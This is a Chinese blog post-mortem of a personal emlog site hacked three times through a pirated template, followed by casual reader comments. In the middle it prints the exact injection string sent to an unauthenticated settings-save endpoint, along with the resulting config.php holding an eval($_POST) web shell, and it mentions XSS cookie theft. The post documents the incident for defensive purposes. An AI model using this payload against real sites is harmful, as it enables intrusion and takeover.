深刻认识什么叫"用户的输入你连标点符号都不要信"

  • 内容
  • 相关

        本博客于前日 2017年7月20日18:55分被攻陷。因为人懒导致部分数据丢失。包括正在计划发布的音乐浮窗插件4.4。很是心痛。在此含痛公布攻防实战。


    7月20日18:55分

        饺子私聊,本站被挂黑页。此时我正在回家的路上。站点被攻陷已确认。我认为黑客只是做代码审计不会做破坏。但其实不然,到家发现包括content所有文件被删。在此鄙视这位黑客删文件的行为和感谢发现如此大的逻辑漏洞。今证实:该黑客使用“风信子泄露的盗版FLY”导致全站清空。看到这条消息我就放心了。


7月20日20:00左右

        正式进入维护阶段。挂维护页。

        第一步,审计日志有所发现:

QQ图片20170722164443.pngQQ图片20170722164448.png

        如图:有IP对FLY的配置文件“”进行POST写操作。稍后就发现被挂马“222.php”并响应200成功。

        然后花了一点时间检查 FLY模板配置的逻辑。不才,确实没有发现什么问题。

    第二次被攻陷 时间不详

        我和饺子商量再把全站恢复让这位黑客再试一次。漏洞重现。

        至此,饺子将整个程序代码分别给“包子”“简爱”和一名知道什么鬼的大神做审计。

        简爱发现“FLY模板的模板设置没有经过任何权限检测即可保存设置”。并且通过模拟提交了木马

        

提交入口:/index.php?do=save

提交的非法数据:";eval($_POST['c']);//

导致config.php变为
<?php
$T_config = "";eval($_POST['c']);//";?>

这就变成了典型的一个无所不能的shell了。


        修复。

        另外说一句,这个漏洞怪不了饺子和我。因为我俩合作写的,我以为他做了权限检测。他以为我做了权限检测。

    第三次被攻陷 时间不详

        这次是全站被修改,可以发现:这次攻陷,这位黑客不能传马和修改文件了。

        如是我们最先想到的是,这位黑客通过XSS得到了管理员cookie或者爆破了管理员账号密码。

        后经证实应该是通过某种xss拿下了管理员的cookie。

        XSS在这里不多做介绍。

        然后俩人熬夜找FLY以及emlog的XSS注入点,找到了N处。

        我就说这样下去不是办法。修复这个XSS泄露管理员cookie才是王道。

        emlog的“authcookie”只要泄露。在不登陆的情况下即可登陆网站。我认为emlog的cookie机制存在不合理的情况下。

        经研究对这块进行了修复。

        另外对包子提供的权限绕过上传zip的漏洞也进行了修复。



本文标签:

版权声明:若无特殊注明,本文皆为《鬼少》原创,转载请保留文章出处。

本文链接:深刻认识什么叫"用户的输入你连标点符号都不要信" - http://tv1314.com/post-389.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注

评论

9条评论
  1. avatar

    起点终站 Lv.3 Chrome 59.0.3071.115 Chrome 59.0.3071.115 Mac OS X 10.12.4 Mac OS X 10.12.4 回复

    xss公布下啊。。是emlog都有这个bug么。。ps,你这头像我很喜欢

    福建省泉州市 电信

    1. avatar

      一个逃学生、 Lv.2 Chrome 50.0.2661.102 Chrome 50.0.2661.102 Windows 7 x64 Edition Windows 7 x64 Edition 回复

      鬼哥 还记得我吗

      四川省达州市 电信

      1. 鬼少 Chrome 56.0.2924.87 Chrome 56.0.2924.87 Windows 7 x64 Edition Windows 7 x64 Edition 回复

        回复了一个逃学生、:唐瑞?

        广东省深圳市 电信

    2. avatar

      风信子 Lv.1 Safari Safari iPhone iOS 10.3.2 iPhone iOS 10.3.2 回复

      围观

      浙江省舟山市 电信

      1. 鬼少 Chrome 56.0.2924.87 Chrome 56.0.2924.87 Windows 7 x64 Edition Windows 7 x64 Edition 回复

        回复了风信子:表情 你能不能不要来丢人现眼了。被人看到了以为我跟你很熟一样。

        广东省深圳市 电信

      2. 风信子 Lv.1 Safari Safari iPhone iOS 10.3.2 iPhone iOS 10.3.2 回复

        回复了鬼少:被打脸了吧 表情

        浙江省舟山市 电信

      3. 鬼少 Chrome 56.0.2924.87 Chrome 56.0.2924.87 Windows 7 x64 Edition Windows 7 x64 Edition 回复

        回复了风信子:打脸?你看你分享的盗版害人不浅吧

        广东省深圳市 电信

      4. 几个川川 Lv.2 Chrome 45.0.2454.101 Chrome 45.0.2454.101 Windows 7 Windows 7 回复

        回复了鬼少:风信子全站被清空? 表情

        上海市 电信

      5. 鬼少 Chrome 50.0.2661.102 Chrome 50.0.2661.102 Windows 7 x64 Edition Windows 7 x64 Edition 回复

        回复了几个川川:没有的哈

        广东省深圳市 电信

    00:00 / 00:00
    顺序播放